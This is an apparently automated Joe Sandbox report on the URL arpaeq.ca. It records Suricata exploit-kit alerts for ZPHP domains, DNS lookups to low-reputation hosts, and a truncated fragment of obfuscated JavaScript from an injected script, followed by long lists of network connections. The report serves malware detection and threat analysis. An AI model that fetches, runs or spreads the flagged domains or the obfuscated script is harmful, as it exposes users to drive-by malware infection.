Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://arpaeq.ca

Overview

General Information

Sample URL:http://arpaeq.ca
Analysis ID:1587504

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
HTML page contains obfuscated javascript
Performs DNS queries to domains with low reputation
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 2916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2004,i,6044703814408051465,12207852372008432556,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 6000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://arpaeq.ca" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-10T13:38:58.223632+010020585171Exploit Kit Activity Detected192.168.2.18650971.1.1.153UDP
2025-01-10T13:38:58.223632+010020585171Exploit Kit Activity Detected192.168.2.18650971.1.1.153UDP
2025-01-10T13:38:58.223799+010020585171Exploit Kit Activity Detected192.168.2.18627911.1.1.153UDP
2025-01-10T13:38:58.223799+010020585171Exploit Kit Activity Detected192.168.2.18627911.1.1.153UDP
2025-01-10T13:38:58.239147+010020585171Exploit Kit Activity Detected192.168.2.18585991.1.1.153UDP
2025-01-10T13:38:58.239147+010020585171Exploit Kit Activity Detected192.168.2.18585991.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-10T13:38:58.158497+010020590031Exploit Kit Activity Detected192.168.2.18535551.1.1.153UDP
2025-01-10T13:38:58.158497+010020590031Exploit Kit Activity Detected192.168.2.18535551.1.1.153UDP
2025-01-10T13:38:58.158796+010020590031Exploit Kit Activity Detected192.168.2.18610911.1.1.153UDP
2025-01-10T13:38:58.158796+010020590031Exploit Kit Activity Detected192.168.2.18610911.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-10T13:38:58.943756+010020590111Exploit Kit Activity Detected192.168.2.184982579.141.161.48443TCP
2025-01-10T13:38:58.943756+010020590111Exploit Kit Activity Detected192.168.2.184982579.141.161.48443TCP

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://islonline.org/j.jsHTTP Parser: function _0xf84e(_0x431087,_0x4ecf5b){const _0xd2e6fd=_0xd2e6();return _0xf84e=function(_0xf84e18,_0
Source: https://arpaeq.ca/HTTP Parser: No favicon
Source: https://arpaeq.ca/HTTP Parser: No favicon
Source: https://arpaeq.ca/HTTP Parser: No favicon
Source: https://arpaeq.ca/HTTP Parser: No favicon
Source: https://arpaeq.ca/HTTP Parser: No favicon
Source: https://arpaeq.ca/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.18:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.18:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49847 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49926 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.18:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.227.215:443 -> 192.168.2.18:49931 version: TLS 1.2

Networking

barindex
Source: Network trafficSuricata IDS: 2059003 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (preisefurmaannerpillen .life) : 192.168.2.18:53555 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059003 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (preisefurmaannerpillen .life) : 192.168.2.18:61091 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2058517 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (haimasher .xyz) : 192.168.2.18:65097 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2058517 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (haimasher .xyz) : 192.168.2.18:58599 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2058517 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (haimasher .xyz) : 192.168.2.18:62791 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059011 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (preisefurmaannerpillen .life) : 192.168.2.18:49825 -> 79.141.161.48:443
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: haimasher.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: haimasher.xyz
Source: DNS query: haimasher.xyz
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: arpaeq.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: arpaeq.ca
Source: global trafficDNS traffic detected: DNS query: netdna.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: islonline.org
Source: global trafficDNS traffic detected: DNS query: preisefurmaannerpillen.life
Source: global trafficDNS traffic detected: DNS query: haimasher.xyz
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
